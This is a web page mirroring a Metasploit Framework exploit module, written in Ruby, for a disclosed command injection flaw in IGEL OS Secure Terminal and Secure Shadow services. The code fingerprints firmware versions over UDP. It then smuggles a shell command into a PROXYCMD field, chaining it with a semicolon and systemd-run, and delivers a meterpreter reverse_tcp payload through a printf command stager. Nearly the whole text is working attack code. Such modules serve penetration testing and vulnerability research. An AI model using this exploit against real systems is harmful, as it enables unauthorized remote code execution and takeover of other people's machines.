Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/misc/igel_command_injection.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Remote::Tcp10include Msf::Exploit::CmdStager11prepend Msf::Exploit::Remote::AutoCheck1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'IGEL OS Secure VNC/Terminal Command Injection RCE',18'Description' => %q{19This module exploits a command injection vulnerability in IGEL OS Secure Terminal20and Secure Shadow services.2122Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure23Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.24},25'License' => MSF_LICENSE,26'Author' => [27'Rob Vinson', # Discovery28'James Brytan', # Research and testing29'James Smith', # Research and testing30'Marisa Mack', # Research and testing31'Sergey Pashevkin', # Research and testing32'Steven Laura' # Research and testing33],34'References' => [35[ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],36[ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]37],38'Platform' => ['linux'],39'Arch' => [ARCH_X86, ARCH_X64],40'Targets' => [41[42'Secure Terminal Service',43{44'Arch' => [ARCH_X86, ARCH_X64],45'Type' => :cmd,46'Platform' => 'linux',47'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 30022 }48}49],50[51'Secure Shadow Service',52{53'Arch' => [ARCH_X86, ARCH_X64],54'Type' => :cmd,55'Platform' => 'linux',56'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 5900 }57}58],59],60'Privileged' => true,61'DisclosureDate' => '2021-02-25',62'CmdStagerFlavor' => ['printf'],63'DefaultTarget' => 0,64'DefaultOptions' => {65'PrependFork' => true66},67'Notes' => {68'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],69'Reliability' => [REPEATABLE_SESSION],70'Stability' => [CRASH_SAFE]71}72)73)7475register_advanced_options(76[77# must enable SSL78OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true]),79]80)81end8283def check84probe = '<igel_scan></igel_scan>'8586connect_udp(true, 'RPORT' => 30005)87udp_sock.put(probe)88res = udp_sock.recvfrom(65535, 0.5)89disconnect_udp9091unless res && res[0]92return Exploit::CheckCode::Unknown93end9495probe_response = res[0]96matches = probe_response.match(/firmwareversion=<([0-9.]+)>/)97unless matches98return Exploit::CheckCode::Unknown99end100101version = matches.captures[0]102vprint_status("IGEL OS Version: #{version}")103version = Rex::Version.new(version)104105if version < Rex::Version.new('10.06.220') && version >= Rex::Version.new('10.0.0')106return Exploit::CheckCode::Appears107elsif version < Rex::Version.new('11.04') && version >= Rex::Version.new('11.03.620')108return Exploit::CheckCode::Safe109elsif version < Rex::Version.new('11.04.270') && version >= Rex::Version.new('11.0.0')110return Exploit::CheckCode::Appears111end112113return Exploit::CheckCode::Safe114end115116def execute_command(cmd, _opts = {})117vprint_status("executing: #{cmd}")118connect119sock.put(%(PROXYCMD PW_;/usr/bin/systemd-run --scope bash -c "#{cmd}";false))120ensure121disconnect122end123124def exploit125execute_cmdstager(linemax: 150, noconcat: true, delay: 2)126rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e127fail_with(Failure::Unreachable, "Failed executing payload with error #{e}.")128end129130end131132133